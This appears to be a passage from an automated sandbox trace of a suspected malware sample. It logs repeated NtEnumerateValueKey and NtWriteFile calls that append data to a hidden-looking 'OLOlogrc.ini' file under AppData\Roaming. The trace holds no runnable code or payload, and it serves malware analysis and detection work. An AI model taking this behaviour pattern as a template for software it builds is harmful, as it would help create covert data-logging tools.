DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.817] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.817] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.817] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x16, ByteOffset=0x24d3b0*=650, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.817] NtClose (Handle=0xac) returned 0x0 [0106.817] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x4, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.817] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.817] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy 
yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.817] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.817] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0xc, ByteOffset=0x24d3b0*=672, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.817] NtClose (Handle=0xac) returned 0x0 [0106.817] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.817] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.818] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 
[0106.818] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x24, ByteOffset=0x24d3b0*=684, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.818] NtClose (Handle=0xac) returned 0x0 [0106.818] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x5, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.818] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.818] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.818] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.818] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x18, ByteOffset=0x24d3b0*=720, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.818] NtClose (Handle=0xac) returned 0x0 [0106.818] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy 
yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.818] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.818] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.818] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x10, ByteOffset=0x24d3b0*=744, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.818] NtClose (Handle=0xac) returned 0x0 [0106.818] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x6, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.818] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.819] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, 
RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.819] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.819] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x18, ByteOffset=0x24d3b0*=760, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.819] NtClose (Handle=0xac) returned 0x0 [0106.819] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.819] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.819] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: 
IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.819] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x10, ByteOffset=0x24d3b0*=784, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.819] NtClose (Handle=0xac) returned 0x0 [0106.819] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x7, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.819] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.819] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.819] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.819] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x14, ByteOffset=0x24d3b0*=800, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.819] NtClose (Handle=0xac) returned 0x0 [0106.819] 
RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.819] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.819] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.819] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x12, ByteOffset=0x24d3b0*=820, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.820] NtClose (Handle=0xac) returned 0x0 [0106.820] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x8, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.820] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.820] NtCreateFile (in: FileHandle=0x24d458, 
DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.820] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.820] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x2e, ByteOffset=0x24d3b0*=838, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.820] NtClose (Handle=0xac) returned 0x0 [0106.827] RtlIntegerToChar (in: Value=0x0, Base=0x0, Length=0x20, String=0x24d498 | out: String="0") returned 0x0 [0106.827] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.827] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, 
Information=0x1)) returned 0x0 [0106.827] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.827] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x6, ByteOffset=0x24d3b0*=884, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.827] NtClose (Handle=0xac) returned 0x0 [0106.827] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x9, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.827] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.827] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.827] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.827] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, 
Length=0x20, ByteOffset=0x24d3b0*=890, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.827] NtClose (Handle=0xac) returned 0x0 [0106.834] RtlIntegerToChar (in: Value=0xe0003, Base=0x0, Length=0x20, String=0x24d498 | out: String="917507") returned 0x0 [0106.835] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.835] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.835] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.835] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x10, ByteOffset=0x24d3b0*=922, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.835] NtClose (Handle=0xac) returned 0x0 [0106.835] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0xa, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.835] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy 
yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.835] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.835] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.835] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x2e, ByteOffset=0x24d3b0*=938, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.835] NtClose (Handle=0xac) returned 0x0 [0106.835] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.835] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, 
FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.835] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.835] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0xc4, ByteOffset=0x24d3b0*=984, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.836] NtClose (Handle=0xac) returned 0x0 [0106.836] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0xb, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.836] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.836] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.836] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: 
